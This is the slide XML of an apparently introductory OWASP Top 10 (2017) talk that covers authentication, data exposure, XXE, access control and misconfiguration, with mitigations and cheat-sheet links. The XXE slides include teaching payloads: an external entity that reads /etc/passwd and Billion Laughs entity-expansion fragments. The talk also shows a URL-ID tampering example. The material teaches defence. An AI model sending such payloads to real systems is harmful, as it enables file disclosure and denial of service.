        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="296102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&lt;!ENTITY lol9 "&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;"&gt;</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="11709" y="2972736"/>
        <a:ext cx="7397630" cy="216432"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1224F3C1-5BB2-455C-8174-30E2B2BC1329}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="322967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]&gt;</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="11709" y="3241386"/>
        <a:ext cx="7397630" cy="216432"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BF060BE8-9A09-4248-A9C8-FAED426CD902}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3498327"/>
          <a:ext cx="74210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&lt;lolz&gt;&amp;lol9;&lt;/lolz&gt;</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="11709" y="3510036"/>
        <a:ext cx="7397630" cy="2164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FD9A0-9356-4A0F-910E-1292F34FFCA6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1182159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OWASP XXE Cheat Sheet</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="22246" y="1204405"/>
        <a:ext cx="10471108" cy="411223"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A85FA0C0-1AE1-459E-BB3C-AF0E6266F33A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1692594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https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html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2246" y="1714840"/>
        <a:ext cx="10471108" cy="411223"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A12721C7-07EE-4E2D-A0D3-423C916EF978}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2203029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OWASP Guidance on XXE Processing</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="22246" y="2225275"/>
        <a:ext cx="10471108" cy="411223"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8C18EE1D-9E2D-4840-BB8A-22EBE02CCB83}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2713464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https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing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2246" y="2735710"/>
        <a:ext cx="10471108" cy="411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79865-6FE2-4DD2-AA70-A93D05E87AA2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="456845"/>
          <a:ext cx="9222996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If I have a web application that shows a user their profile like this: </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="29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https://exampleapp.cryptojones.dev/userinfo/51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56315" y="513160"/>
        <a:ext cx="9110366" cy="1040990"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BB47FA27-2962-482A-8343-094F2F5273E8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1693985"/>
          <a:ext cx="9222996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and If the user change the number from 51 to 50 and see another user's information, that is broken access control!</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="56315" y="1750300"/>
        <a:ext cx="9110366" cy="10409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C0366-5D4D-4730-8D63-CFAF3B5B0E43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239E3-6134-490C-B32D-214F642885D4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Use XML or JSON</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="559800" y="3022743"/>
        <a:ext cx="4320000" cy="720000"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B80AB3B4-2986-4418-89B7-1A141B2582C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5433A-17DF-44EC-8F63-D967BDA7F068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Keep parsers up to date</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5635800" y="3022743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41920-AD1B-4FED-ABAA-3FB5EA4CA79B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="269716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  <a:r>
            <a:rPr lang="en-US" sz="2900" kern="1200" baseline="30000"/>
            <a:t>rd</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2900" kern="1200"/>
            <a:t> Party Libraries are Always Secure, right?</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="33955" y="303671"/>
        <a:ext cx="10447690" cy="627655"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8FB0942E-0A9B-4DCB-A096-2BD289AC5651}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1048801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CVE-2016-5000 Apache POI Information Disclosure</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="33955" y="1082756"/>
        <a:ext cx="10447690" cy="627655"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CC73229A-C07C-4B1F-8FA2-26ADB5BB1291}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1827886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CVE-2016-4216 Adobe XMP Toolkit for Java Information Disclosure</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="33955" y="1861841"/>
        <a:ext cx="10447690" cy="627655"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{984A1154-510F-480D-98B7-AB5F082DDD0E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2606971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CVE-2016-3081 Remote Code Execution vuln in Apache Struts</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="33955" y="2640926"/>
        <a:ext cx="10447690" cy="627655"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{27697848-FB03-49A2-BCF5-9ABC25AB7BE1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3386056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CVE-2015-8103 Remote Code Execution vuln in Jenkins</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="33955" y="3420011"/>
        <a:ext cx="1044769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A245-1088-42E1-B900-5C97237BA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29886-3FA3-432E-A616-1C9420E3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42B1-7F2B-4DDF-B8FC-D6E0145F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F4B7-3208-4E07-AA22-4D4A394B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232F-4BDA-4905-BDE6-67A9D4D7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90B8-84B3-470E-8952-8FE19CA3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4CCAA-58E6-48BE-BA3C-FD8FEDD7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22F4-30FA-41EC-A4D4-FFA25CDE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FCA6-4CFB-4E90-B34D-A98D4151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E73E-34D1-424F-A33A-2B6C69F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AD8A7-6F3E-40E6-9E28-82A701A0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DBCC6-94AB-4206-84DC-19602B456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3EB7-C8C4-46FC-B21F-08DC7FAC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F07F-980F-4CF2-B930-C8A458A4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6C1A-1B20-4F01-9C4C-373C2CF0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1C1E-D4C1-4428-863D-AC37218B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D418-99CA-450A-A8E6-0A9873B5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1D9B-53A6-494E-82B2-BBC706D3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D479-7AC5-44CE-BE95-3D2E0C37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7D56-3E63-49EB-9201-63FF1344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F804-0FBD-4704-B31B-C853F7BC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78D24-5670-4760-8131-53622D16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8420-4AAC-4283-9112-18830DD4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4343-B809-48D3-B1D3-8634F77F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5896-060B-42BC-838A-A54932DB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5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ED7A-F9C5-459C-BDA6-D1EDFC35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C941-7E62-459F-A2AF-6BC1980AF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C846F-65AE-4B13-8763-595D12825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18B5E-5C78-428B-A01B-BF262142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212F-1F42-4D7F-86BE-310B5ABE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FF8AC-BB30-41AA-9E09-C235075B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0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A17-C8AC-4A81-AA87-C7C5F016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8EE6-A027-49ED-A5FC-8EA230AC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263CF-DA69-43AA-9854-11319F03D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B1311-1CC2-40C7-9293-5BEC37DBE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06653-A048-4D44-8AC9-0A34825B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84B10-873D-405C-9CC6-FA26DD6D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8C476-2C35-4CDB-BB9B-B6FD26FC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BF263-896E-4D8A-9D03-9E8DB758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1AB1-8F15-461B-8D63-AB6FDC8E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16B86-DD33-4BDE-9C13-2DDC05BC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D620B-0039-44C6-A7B8-36EF7AFB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741E1-02FC-4F8D-AA7D-111E392A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67C07-05A4-4E2C-B81D-824CD03C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D1218-356F-48E8-AE56-54D8EF38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D703B-8C94-4AEB-A70A-0D552716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6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74A8-EAAE-408A-B1C7-7FB5B57C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82A4-66C7-4C71-8698-E8AE4C26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DC97D-B1B6-4231-B599-42C4ED02D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8E18D-8407-43DC-89C4-AAF06579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33CD-E267-4360-A815-D1A81C72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621F-BEBD-405A-9E5D-B442C50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4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EBD3-4DBE-4FDF-B12C-49AB5058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12797-6D12-478A-8219-8CE093B76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9392-00DF-4E1F-9251-C911CE03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EE8EC-C971-4568-9520-49D335BC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0A008-3AAA-4521-A0A3-2A0157D1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D5988-F60F-4BEE-A1CB-D1487E2B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0DE86-897A-423F-AFC4-0D093D71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924DF-F55B-4421-BD8A-3AD9AC99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73E7-16AC-4359-B532-DFC74592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0952-DDD3-46C4-A1A7-6C5ECBFF1A81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E936-AA6D-4D8C-8D9B-E1A303138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6AC60-D632-4EA1-B1DA-80761958B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4C5E-0772-4721-8113-E6CA3BE1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TLS_Cipher_String_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Shee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eatsheetseries.owasp.org/cheatsheets/REST_Security_Cheat_Sheet.html#https" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/DotNet_Security_Cheat_Sheet.html#a6-sensitive-data-exposure" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Pinning_Cheat_Sheet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Attribute-based_access_contro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/detail/sp/800-162/final" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Access_Control_Cheat_She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ccess.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html-single/selinux_users_and_administrators_guide/inde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/detail/sp/800-162/final" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Access_Control_Cheat_She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Cross_Site_Scripting_Prevention_Cheat_Shee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wasp.org/www-community/xss-filter-evasion-cheatsheet" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet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topten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hyperlink" Target="http://www.manicode.com/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:jim@manicod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SMcZ0el-9r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Query_Parameterization_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_She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B882E-4EE8-4F5A-8022-D2249131E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Introduction to the </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4000"/>
              <a:t>OWASP TOP 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12FFA-4295-4858-9CF0-08B0E813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 fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4200" dirty="0"/>
              <a:t>OWASP Omaha</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4200" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4200" baseline="30000" dirty="0"/>
              <a:t>ND</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4200" dirty="0"/>
              <a:t> QTR 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0FAD0-FDD9-4909-8FE5-E41DFFE6F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266049"/>
            <a:ext cx="11097349" cy="38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6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A2:2017 – Broken Authentication &amp;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session Management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/>
              <a:t>Special Publication 800-63-3: Digital AuthN Guidelines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Allow ALL printable ASCII characters including spaces and accept all unicode characters too... including emoji!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>At least 8 characters (BUT 16+ Better), Allow up to 64!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Stop crazy special character rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Don't use password security or hints</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Throttle or mitigate brute force attempts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3230868"/>
            <a:ext cx="4788505" cy="166400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22" y="643467"/>
            <a:ext cx="9439452" cy="32802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A2:2017 – Broken Authentication &amp;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Session Management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OWASP Authentication Cheat Sheet!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https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html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87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A3:2017 – Sensitive Data Exposure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4A929E1-FFBD-4087-A835-9AF9B83D11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6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66" y="780655"/>
            <a:ext cx="3751662" cy="3261168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A3:2017 – Sensitive Data Exposure (Mitigations)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8922"/>
            <a:ext cx="2138070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69002"/>
            <a:ext cx="2146028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0" y="4512569"/>
            <a:ext cx="5428798" cy="188650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639" y="900442"/>
            <a:ext cx="3514088" cy="5048417"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Always Encrypt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Use TLS/HTSTS Always!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Encrypt Message BEFORE they are sent</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>(JSON Web Encryption)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Sign Messages BEFORE the are transmitted</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>(JSON Web Signature)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Manage keys/certificates properly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Verify TLS Certificates before using them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6948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66" y="780655"/>
            <a:ext cx="3751662" cy="3261168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A3:2017 – Sensitive Data Exposure (Mitigations)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(Continued)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8922"/>
            <a:ext cx="2138070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69002"/>
            <a:ext cx="2146028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0" y="4512569"/>
            <a:ext cx="5428798" cy="188650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639" y="900442"/>
            <a:ext cx="3770998" cy="504841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 Audited/Std Libs!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Libsodium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Go-to for me as a .NET Developer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Tink</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Tink ties in with most secrets managements solutions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Isolate your cryptographic progress from other services</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(Own VM/Physical Server)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E09AC-9E35-4D9E-B35D-6BDCF024A1F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5074385" y="654819"/>
            <a:ext cx="215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NEVER ROLL YOUR OWN CRYPTO!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55871-9680-4A37-A469-301ECCFEC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362" y="1418538"/>
            <a:ext cx="3259609" cy="32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4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321732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4" y="1229897"/>
            <a:ext cx="6579910" cy="22865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0891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5963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A3:2017 – Sensitive Data Exposure(Guidance)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413" y="1526796"/>
            <a:ext cx="4044331" cy="486437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9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https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="19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https://cheatsheetseries.owasp.org/cheatsheets/TLS_Cipher_String_Cheat_Sheet.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="19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https://cheatsheetseries.owasp.org/cheatsheets/Pinning_Cheat_Sheet.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="19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https://cheatsheetseries.owasp.org/cheatsheets/DotNet_Security_Cheat_Sheet.html#a6-sensitive-data-exposure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="19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https://cheatsheetseries.owasp.org/cheatsheets/REST_Security_Cheat_Sheet.html#https</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="19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https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/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2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A4:2017 – XML External Entities (XXE)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Parsers suck when it comes to Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XXE Attacks against an XML Service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DE2217-3D23-46EE-8600-D4C6B51C0B60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1027516" y="3465871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&lt;?xml version="1.0" encoding="UTF-8"?&gt;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           &lt;!DOCTYPE foo [ &lt;!ENTITY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xxe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SYSTEM "file:///etc/passwd"&gt; ]&gt;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      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stockCheck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&gt;&lt;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productId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&gt;&amp;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xxe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;&lt;/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productId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&gt;&lt;/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stockCheck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82991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A4:2017 – XML External Entities (XXE)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91" y="1433359"/>
            <a:ext cx="10515600" cy="13934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Billion Laughs Attack (exponential entity expansion) -- uses multiple levels of nested entities. Each entity refers to another entity several times, and the final entity definition contains a small string. The exponential expansion results in several gigabytes of text and consumes lots of memory and CPU time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="100" dirty="0"/>
              <a:t>&lt;?xml version="1.0"?&gt;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147" y="5356339"/>
            <a:ext cx="2669914" cy="92779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6ABC3FD-738A-411D-96B3-FF57B3471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613347"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="316939" y="2981210"/>
          <a:ext cx="7421048" cy="374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350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FCE169-4276-4005-8C82-CCC9C80C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461736"/>
            <a:ext cx="6675119" cy="186629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55" y="730155"/>
            <a:ext cx="6090743" cy="142287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A4:2017 – XML External Entities (XXE) (Mitigations)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467575"/>
            <a:ext cx="2148840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990" y="471340"/>
            <a:ext cx="2148840" cy="1856689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76301"/>
            <a:ext cx="6675119" cy="3922777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2717021"/>
            <a:ext cx="6034514" cy="3410824"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Disable DTD Inclusion in Documents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Set Depth limits on recursive parsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Set Memory Limits for Parsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>In Java, disable all External entity references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955DCA-E99D-4678-99DB-8075105C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9951" y="2480956"/>
            <a:ext cx="4453128" cy="3922776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95" y="3752837"/>
            <a:ext cx="3977640" cy="138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30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A4:2017 – XML External Entities (XXE) (Guidance)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6A761B6-6F1A-44AE-B865-37673BE42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655857"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="838200" y="106034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65" y="4410831"/>
            <a:ext cx="6551595" cy="227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7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1826C-0F9D-4469-97C0-BF04AC78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Who is CryptoJones?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DD2662D-8A7C-43FF-A76A-381116417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127248"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="438912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69737C7-1932-40C7-A3C7-5409DB603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106" y="544583"/>
            <a:ext cx="5134296" cy="3671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B2836-1822-46C8-82B1-C20C4A8E3A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2392" y="2660367"/>
            <a:ext cx="2655496" cy="2655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1CDB7-4C05-4049-A01C-7B5C146744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96" y="4760188"/>
            <a:ext cx="5135719" cy="17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5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A5:2017 – Broken Access Control (Example)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57258FD-BA66-4501-83CD-147617006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516555"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="756746" y="2863018"/>
          <a:ext cx="9222996" cy="3304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339" y="690531"/>
            <a:ext cx="3858600" cy="1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21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72" y="1068165"/>
            <a:ext cx="5568995" cy="1457002"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4100"/>
              <a:t>A5:2017 – Broken Access Control (Mitigations)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92" y="2985635"/>
            <a:ext cx="5568991" cy="2968014"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Consider using attribute-based access controls design (ABAC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Attribute-based_access_control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>“Access rights are granted to users through the use of policies which combine attributes together”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(In AWS, for example, these are called tags)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89" y="2630689"/>
            <a:ext cx="4683319" cy="16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3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A5:2017 – Broken Access Control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32" y="640082"/>
            <a:ext cx="733486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OWASP Access Control Cheat Sheet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://cheatsheetseries.owasp.org/cheatsheets/Access_Control_Cheat_Sheet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NIST Guide to ABAC Definition and Considerations (SP 800-162)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://csrc.nist.gov/publications/detail/sp/800-162/final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492991"/>
            <a:ext cx="6894236" cy="23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7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433763"/>
            <a:ext cx="4809068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A6:2017 – Security Misconfigurations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24" y="2349910"/>
            <a:ext cx="2345401" cy="8150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44208-AAFC-4C3A-A4F1-EF3D72AF4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643467"/>
            <a:ext cx="5257799" cy="5533496"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This subject is HUGE! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From layer 3 switches to Application Firewalls, misconfigurations can be disastrous</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Anything can be misconfigured!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56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A6:2017 – Security Misconfigurations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/>
              <a:t>Verify, Verify, Verify</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Manual scans can't find this types of issues, you need to audit this stuff</a:t>
            </a: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92" y="3439644"/>
            <a:ext cx="4802404" cy="166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0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A6:2017 – Security Misconfigurations (Guidance)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153626" cy="2741213"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:norm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There are so many different “hardening” guidelines depending on the product you are talking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The quick brown fox jumped of the lazy dog</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My personal favorite (</a:t>
